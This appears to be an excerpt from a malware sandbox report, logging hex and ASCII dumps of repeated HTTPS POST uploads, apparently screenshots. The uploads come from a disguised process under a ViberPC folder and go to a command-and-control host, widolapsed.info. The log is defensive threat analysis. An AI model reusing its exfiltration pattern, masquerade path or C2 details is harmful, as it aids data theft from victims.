                                                                                                      2021-09-15 11:46:35 UTC2440OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:35 UTC2456OUTData Raw: b5 27 eb 48 75 c0 bf ea ad 63 1f 5a 3d a5 47 b4 43 d8 53 5b c8 a8 b6 93 b7 48 cf e5 56 ed 34 db 8f 34 31 43 d6 a3 6d 76 e8 fd d0 8b f4 14 c4 d5 6f 1e 45 cc a7 04 f6 15 32 55 9a 34 a6 a8 46 4b 76 5c f1 9a ed 86 d4 1f 4a e5 f4 ff 00 f9 08 db ff 00 d7 45 ae 9b c6 24 b5 b5 a1 3d 4a d7 33 a7 ff 00 c8 46 df fe ba 0f e7 4b 0f fc 03 ae b7 f1 8f 42 d4 52 dc cc 1a 69 42 9c 74 aa 46 6d 36 3e ae 4d 56 f1 21 22 f5 70 7f 86 b1 7a f7 ac 28 50 e6 82 6d 93 89 c6 72 54 71 51 3a 03 a9 e9 e9 f7 22 26 98 75 c8 97 fd 5d b8 ac 2a 2b 75 85 87 53 91 e3 ea f4 36 1b 5f 9b f8 23 51 50 3e b3 76 dd 1b 1f 4a ce a2 a9 61 e9 ae 86 4f 17 59 f5 2d b6 a1 72 ff 00 7a 56 fc e9 be 74 8d d5 c9 fc 6a bd 39 6a fd 9c 56 c8 95 5a 6f 76 4b b8 9e a4 d2 e6 9a 29 69 58 b5 26 c7 53 85 37 34 b9 a4 5a 63
                                                                                                      Data Ascii: 'HucZ=GCS[HV441CmvoE2U4FKv\JE$=J3FKBRiBtFm6>MV!"pz(PmrTqQ:"&u]*+uS6_#QP>vJaOY-rzVtj9jVZovK)iX&S74Zc
                                                                                                      2021-09-15 11:46:35 UTC2472OUTData Raw: 4b 4d a5 a0 42 d2 51 45 00 2e 68 a4 a2 80 16 8a 4a 28 01 68 a2 8a 00 5a 29 29 69 88 29 69 28 a6 01 45 14 52 00 a2 8a 28 00 a2 8a 28 00 a5 a4 a2 80 16 8a 4a 5a 60 14 51 45 02 16 8a 4a 28 01 68 a4 a2 80 16 8a 4a 28 01 68 a2 8a 00 28 a2 8a 62 16 92 8a 28 01 68 a2 8a 00 28 a2 8a 00 28 a2 8a 00 5a 29 05 2d 31 05 2d 25 19 a0 05 a2 93 34 50 02 d1 9a 4a 28 01 73 45 25 2d 02 0a 28 a2 80 0a 5a 4a 5a 60 14 b4 94 50 02 f7 a2 8a 28 00 a2 92 96 98 0b 45 25 14 08 5a 29 29 68 01 68 a4 a2 98 85 a2 8a 28 01 69 28 cd 14 00 b4 51 45 00 14 b4 94 50 02 d0 29 29 69 88 5a 33 49 45 31 0b 9a 33 49 45 00 3b 34 53 69 68 b8 58 5a 33 49 9a 4c d1 70 b0 ec d1 9a 6e 68 a2 e1 61 f9 a3 34 da 33 4e e2 b0 ec d2 66 9b 4b 9a 57 1d 85 cd 2e 69 b4 99 a2 e1 61 d4 66 93 34 51 70 b0 ec d2 1a 4a 33
                                                                                                      Data Ascii: KMBQE.hJ(hZ))i)i(ER((JZ`QEJ(hJ(h(b(h((Z)-1-%4PJ(sE%-(ZJZ`P(E%Z))hh(i(QEP))iZ3IE13IE;4SihXZ3ILpnha43NfKW.iaf4QpJ3
                                                                                                      2021-09-15 11:46:35 UTC2482OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 39 35 36 31 34 35 36 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------795614568--
                                                                                                      2021-09-15 11:46:35 UTC2482INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:35 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=72d2c764d55caf667dfeff3581d5b1fa729c64d8bcdddda5db7f4f99dd5879f8; expires=Thu, 15-Sep-2022 11:46:35 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:35 UTC2483INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      32192.168.2.34982345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:36 UTC2483OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76736
                                                                                                      Content-Type: multipart/form-data; boundary=--------572333967
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:36 UTC2483OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 37 32 33 33 33 39 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------572333967Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:36 UTC2483OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 7e d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe~0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:36 UTC2483OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:36 UTC2499OUTData Raw: 57 7f a6 5d 8d 47 4b 86 e5 90 0f 35 3e 65 ed 9e 86 b9 6a 54 c4 50 b4 a6 ee 8e aa 74 f0 f5 ef 18 2b 33 ca 2b 3f 59 ff 00 8f 44 ff 00 ae 83 f9 1a e8 bc 43 60 34 ed 62 68 10 62 33 f3 a7 d0 f6 fe 62 b9 dd 67 fe 3d 13 fe ba 0f e4 6b b2 a4 94 a9 39 2e a8 e3 a7 17 1a ca 2f a3 31 68 a2 8a f3 0f 54 28 a2 92 80 3d ea 58 03 fc c9 c3 7f 3a 80 64 1c 1e a2 ae 1a a6 c7 f7 af fe f1 af 97 a8 96 e7 af 16 48 a6 bc 63 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e cc a6 bc 67 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e 86 59 f1 48 e5 c5 ec 8a 14 b4 94 b5 ec 9c 41 46 28 a2 81 06 2b d3 fe 14 f1 a4 df 7f d7 71 ff 00 a0 d7 98 57 a7 7c 2a ff 00 90 4d f7 fd 77 1f fa 0d 67 57 e1 34 a7 f1 1d d5 25 64 d8 da c0 fa 4d b5 cd cc f7 59 68 16 49 1c dd ca 07 dd 04 9f bd 56 52 c2 d6 48 d5 e3 9a e9
                                                                                                      Data Ascii: W]GK5>ejTPt+3+?YDC`4bhb3bg=k9./1hT(=X:dHc^R3^g^R3^YHAF(+qW|*MwgW4%dMYhIVRH
                                                                                                      2021-09-15 11:46:36 UTC2515OUTData Raw: 48 13 d6 a9 21 36 26 29 71 4e 02 9d c5 55 88 b8 c0 29 e3 8a 28 a6 4d c2 96 92 96 98 85 14 b4 da 5a 00 29 73 4d a5 34 00 b9 a3 3e 94 da 5c 1a 00 76 69 33 40 14 e0 28 10 80 53 80 a0 0a 75 04 b6 14 94 b8 a3 14 c4 14 b4 94 b4 08 29 cb 4d a5 a0 07 d1 4d a7 0a 64 8b 45 25 2d 02 2c e9 df f1 fd 17 d6 9f 7a 7f d3 65 ff 00 7a 99 a7 7f c7 f4 5f 5a 5b b3 9b a9 3f de ac 3f e5 e9 6f f8 64 54 94 51 5a 98 8b 45 25 2d 00 14 51 45 02 16 8a 4a 5a 40 14 51 45 02 0a 5a 4a 5a 40 14 b4 94 a2 81 0a 29 69 29 69 08 5a b1 03 74 15 5a a6 b7 fb d5 12 d8 d2 93 b4 8d 7d 58 e3 c3 43 dd ab 89 7e b5 d9 eb 3c 78 69 3f de ae 2d cf 35 8e 17 e0 7e a7 a9 5f e3 5e 87 7a 38 f0 ed 97 d0 55 1c d5 d6 e3 c3 f6 23 fd 91 fc aa 8d 73 d1 eb ea 69 88 7e f2 f4 17 34 66 92 92 b6 39 ee 3b 34 a1 a9 a2 8a 2c
                                                                                                      Data Ascii: H!6&)qNU)(MZ)sM4>\vi3@(Su)MMdE%-,zez_Z[??odTQZE%-QEJZ@QEZJZ@)i)iZtZ}XC~<xi?-5~_^z8U#si~4f9;4,
                                                                                                      2021-09-15 11:46:36 UTC2531OUTData Raw: 28 10 52 d1 8a 5c 52 b8 84 a2 9c 14 fa 53 96 27 6e 8a 7f 2a 4e 48 76 6c 65 15 3a da 4e df 76 36 fc aa 74 d3 2e 9b fe 59 1a 87 52 2b a9 4a 94 de c8 a5 45 6a 2e 8d 39 fb c5 57 ea 69 e3 49 8d 79 92 e6 31 f8 d6 6f 11 0e e5 ac 35 47 d0 c9 e2 8c 56 bf d9 34 d8 ff 00 d6 5d 03 f4 a3 cd d2 23 fe f3 d2 f6 fd 93 29 61 9f 56 91 93 8a 78 8d cf 01 49 fc 2b 44 ea 5a 7c 7f ea ed 49 fa d2 1d 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48
                                                                                                      Data Ascii: (R\RS'n*NHvle:Nv6t.YR+JEj.9WiIy1o5GV4]#)aVxI+DZ|Ip/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUH
                                                                                                      2021-09-15 11:46:36 UTC2547OUTData Raw: 51 9a 41 61 68 a4 cd 26 69 dc 2c 2d 14 d2 69 33 4a e5 58 76 68 a6 d2 e6 95 c2 c2 d1 4d cd 19 a0 2c 48 3a 51 48 0d 15 44 81 a4 cd 06 9b 52 d9 49 0b 9a 29 28 34 5c 02 8a 4a 29 0c 75 14 94 b4 c4 55 a5 a2 8a c4 d8 28 a2 8a 00 28 a2 8a 00 28 a2 92 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a6 02 d1 49 45 00 2d 25 2d 14 00 94 51 45 00 14 51 45 00 2d 14 94 50 02 d2 d3 69 68 10 b4 94 51 40 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd
                                                                                                      Data Ascii: QAah&i,-i3JXvhM,H:QHDRI)(4\J)uU((((((IE-%-QEQE-PihQ@)(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%
                                                                                                      2021-09-15 11:46:36 UTC2558OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 37 32 33 33 33 39 36 37 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------572333967--
                                                                                                      2021-09-15 11:46:36 UTC2558INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:36 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=b1931c04830111111aea6eb3571371f63d3f729b5027d6c58c11874ad7a7a773; expires=Thu, 15-Sep-2022 11:46:36 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:36 UTC2558INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      33192.168.2.34982445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:38 UTC2559OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76592
                                                                                                      Content-Type: multipart/form-data; boundary=--------3756762824
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:38 UTC2559OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 37 35 36 37 36 32 38 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3756762824Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:38 UTC2559OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 c8 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:38 UTC2559OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:38 UTC2575OUTData Raw: bd 0c b3 e2 91 cb 8b d9 14 29 69 29 6b d9 38 82 8c 51 45 02 0c 57 a7 fc 29 e3 49 be ff 00 ae e3 ff 00 41 af 30 af 4e f8 55 ff 00 20 9b ef fa ee 3f f4 1a ce af c2 69 4f e2 3b aa 4a c9 b1 b5 81 f4 9b 6b 9b 99 ee b2 d0 2c 92 39 bb 94 0f ba 09 3f 7a ac a5 85 ac 91 ab c7 35 d3 2b 0c 82 2f 25 c1 1f f7 d5 62 e3 14 f7 fc 3f e0 9a 29 49 ad bf 1f f8 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61
                                                                                                      Data Ascii: )i)k8QEW)IA0NU ?iO;Jk,9?z5+/%b?)IMR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((a
                                                                                                      2021-09-15 11:46:38 UTC2591OUTData Raw: 80 29 69 29 45 02 14 52 d2 52 d2 10 b5 62 06 e8 2a b5 4d 6f f7 aa 25 b1 a5 27 69 1a fa b1 c7 86 87 bb 57 12 fd 6b b3 d6 78 f0 d2 7f bd 5c 5b 9e 6b 1c 2f c0 fd 4f 52 bf c6 bd 0e f4 71 e1 db 2f a0 aa 39 ab ad c7 87 ec 47 fb 23 f9 55 1a e7 a3 d7 d4 d3 10 fd e5 e8 2e 68 cd 25 25 6c 73 dc 76 69 43 53 45 14 58 13 1f 93 4e dc 7d 69 82 96 a5 a2 d3 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e
                                                                                                      Data Ascii: )i)ERRb*Mo%'iWkx\[k/ORq/9G#U.h%%lsviCSEXN}id81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn
                                                                                                      2021-09-15 11:46:38 UTC2607OUTData Raw: db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93
                                                                                                      Data Ascii: gvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"
                                                                                                      2021-09-15 11:46:38 UTC2623OUTData Raw: 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c d1 70 b0 ea 33 49 9a 28 b8 58 76 69 0d 25 19 a7 70 b0 51 49 45 20 16 8c d2 51 40 58 5c d1 4d cd 19 a5 71 d8 5a 33 4d cd 19 a2 e1
                                                                                                      Data Ascii: S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4Lp3I(Xvi%pQIE Q@X\MqZ3M
                                                                                                      2021-09-15 11:46:38 UTC2634OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 37 35 36 37 36 32 38 32 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3756762824--
                                                                                                      2021-09-15 11:46:38 UTC2634INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:38 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=aa91a2eb5bead98ff02ea94f8df9e3120d4fc8a6fd34c1e07024113508dd1e04; expires=Thu, 15-Sep-2022 11:46:38 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:38 UTC2634INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      34192.168.2.34982545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:40 UTC2634OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76612
                                                                                                      Content-Type: multipart/form-data; boundary=--------4010773262
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:40 UTC2634OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 30 31 30 37 37 33 32 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------4010773262Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
